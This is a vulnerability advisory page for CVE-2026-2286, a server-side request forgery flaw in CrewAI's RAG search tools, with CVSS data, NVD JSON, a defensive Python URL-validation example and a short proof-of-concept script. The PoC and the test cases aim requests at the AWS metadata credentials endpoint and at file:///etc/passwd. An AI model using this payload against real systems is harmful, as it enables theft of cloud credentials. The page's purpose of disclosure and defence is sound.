Security Vulnerability Report
CVE-2026-2286 CVSS 9.8 CRITICAL

Published: 2026-03-30 16:16:05
Last Modified: 2026-04-15 13:36:46

Description

CrewAI contains a server-side request forgery vulnerability that enables content acquisition from internal and cloud services, facilitated by the RAG search tools not properly validating URLs provided at runtime.
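The description above names the root cause: the RAG search tools pass a URL supplied at runtime to the fetcher without validating it, so a URL pointing at a link-local or private address reaches internal services such as a cloud metadata endpoint. As an added example, written for this page and not taken from CrewAI's code (which the page does not show), here is that vulnerable fetch pattern beside a hardened check, in Python since CrewAI is a Python project. The function names, the `resolver`/`http_get` parameters and the DNS and HTTP sample data are all constructed for the example.

```python
"""
Added example, not CrewAI's code: the SSRF pattern CVE-2026-2286 describes (a
runtime-supplied URL handed straight to an HTTP client) beside a hardened check
that validates the resolved addresses and re-checks every redirect hop. Function
names, the resolver/http_get parameters and the sample data are illustrative.
"""
import ipaddress
import socket
from urllib.parse import urljoin, urlsplit

ALLOWED_SCHEMES = {"http", "https"}
REDIRECT_CODES = {301, 302, 303, 307, 308}

def fetch_unsafe(url, http_get):
    """Vulnerable pattern: whatever URL the caller supplies is fetched as-is."""
    return http_get(url)

def is_public(addr):
    """True only for globally routable, non-multicast addresses."""
    ip = ipaddress.ip_address(addr)
    if ip.version == 6 and ip.ipv4_mapped is not None:  # ::ffff:169.254.169.254
        ip = ip.ipv4_mapped
    return ip.is_global and not ip.is_multicast

def resolve_all(host):
    """Default resolver: every address (A and AAAA) the host resolves to."""
    infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    return sorted({info[4][0] for info in infos})

def check_url(url, resolver=resolve_all):
    """Return url if every address its host resolves to is public, else raise.
    Checking resolved addresses, not the hostname string, is what catches
    '2130706433' (decimal 127.0.0.1), mixed public/private answers and IPv6."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if parts.username or parts.password:
        raise ValueError("credentials in URL are not allowed")
    host = parts.hostname
    if not host:
        raise ValueError("missing host")
    addrs = resolver(host)
    if not addrs:
        raise ValueError(f"host does not resolve: {host}")
    for addr in addrs:
        if not is_public(addr):
            raise ValueError(f"{host} resolves to non-public address {addr}")
    return url

def fetch_checked(url, http_get, resolver=resolve_all, max_redirects=3):
    """Validate, fetch with auto-redirects off, re-validate each Location hop.
    http_get(url) returns (status, headers, body) without following redirects,
    e.g. requests.get(url, allow_redirects=False, timeout=10); lower-case headers."""
    for _ in range(max_redirects + 1):
        check_url(url, resolver)
        status, headers, body = http_get(url)
        if status in REDIRECT_CODES and "location" in headers:
            url = urljoin(url, headers["location"])  # relative Location handled
            continue
        return status, body
    raise ValueError("too many redirects")

# Constructed offline stand-ins for DNS and HTTP so the example needs no network;
# 93.184.216.34 is used only as an arbitrary public address.
FAKE_DNS = {
    "docs.example.com": ["93.184.216.34"],
    "mixed.example.com": ["93.184.216.34", "10.0.0.5"],  # one private answer
    "169.254.169.254": ["169.254.169.254"],              # cloud metadata service
    "2130706433": ["127.0.0.1"],                         # decimal form of 127.0.0.1
}
METADATA = "http://169.254.169.254/latest/meta-data/"
FAKE_HTTP = {
    "https://docs.example.com/page": (200, {}, "public page"),
    "https://docs.example.com/redir": (302, {"location": METADATA}, ""),
    METADATA: (200, {}, "iam/security-credentials/"),
}

def fake_get(url):
    return FAKE_HTTP.get(url, (404, {}, ""))

def demo():
    """Run the unsafe and the checked fetcher over the constructed cases."""
    results = {"unsafe": fetch_unsafe(METADATA, fake_get)[2],
               "public": fetch_checked("https://docs.example.com/page", fake_get, FAKE_DNS.get)[1]}
    cases = {"metadata": METADATA, "decimal": "http://2130706433/",
             "mixed": "https://mixed.example.com/", "file": "file:///etc/passwd",
             "redirect": "https://docs.example.com/redir"}
    for name, url in cases.items():
        try:
            fetch_checked(url, fake_get, FAKE_DNS.get)
            results[name] = "allowed"
        except ValueError as exc:
            results[name] = f"blocked: {exc}"
    return results

if __name__ == "__main__":
    print(demo())
```

Two caveats a practitioner should keep in mind. First, `check_url` resolves the name once and the HTTP client resolves it again when it connects, so a rebinding DNS answer can still pass the check and then hit an internal address; closing that gap means connecting to the vetted IP directly (pinning it in the transport) rather than handing the hostname back to the client. Second, the check belongs in the tool layer, not in the prompt: with an agent framework the URL may be chosen by the model under prompt injection, which is exactly the "provided at runtime" case the description refers to. Requiring IMDSv2-style session tokens and blocking 169.254.169.254 at the network or egress proxy are defence in depth on top of the URL check, not substitutes for it.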

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:crewai:crewai:1.0.0:*:*:*:*:*:*:* - VULNERABLE
Affected versions: the NVD configuration above matches only crewai 1.0.0; refer to the official security advisory (CERT/CC VU#221883, https://www.kb.cert.org/vuls/id/221883) for the exact affected and fixed versions.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
PoC for CVE-2026-2286 (CrewAI SSRF)

This script demonstrates how a malicious URL can be sent to the vulnerable RAG tool.
"""
import requests

# Hypothetical endpoint and request shape; the page does not document the
# tool's real API, so adjust both to the instance under test.
target_url = "http://target-crewai-instance:8000/api/rag/search"

# Payload targeting internal metadata (AWS example)
payload_url = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

data = {
    "query": "test",
    "url": payload_url,  # Malicious internal URL
}

try:
    response = requests.post(target_url, json=data, timeout=10)
    if response.status_code == 200:
        print("[+] SSRF Successful! Response from internal service:")
        print(response.text)
    else:
        print("[-] Request failed or filtered.")
except Exception as e:
    print(f"Error: {e}")

References

https://www.kb.cert.org/vuls/id/221883 (CERT/CC VU#221883; tagged Third Party Advisory, VDB Entry)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-2286",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-30T16:16:04.777",
    "lastModified": "2026-04-15T13:36:46.303",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "CrewAI contains a server-side request forgery vulnerability that enables content acquisition from internal and cloud services, facilitated by the RAG search tools not properly validating URLs provided at runtime."},
      {"lang": "es", "value": "CrewAI contiene una vulnerabilidad de falsificación de petición del lado del servidor que permite la adquisición de contenido de servicios internos y en la nube, facilitada por las herramientas de búsqueda RAG que no validan correctamente las URL proporcionadas en tiempo de ejecución."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}
    ],
    "configurations": [
      {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:crewai:crewai:1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "3DC9BCCB-78E5-4D50-9EAD-6F54EB4E3153"}]}]}
    ],
    "references": [
      {"url": "https://www.kb.cert.org/vuls/id/221883", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}
    ]
  }
}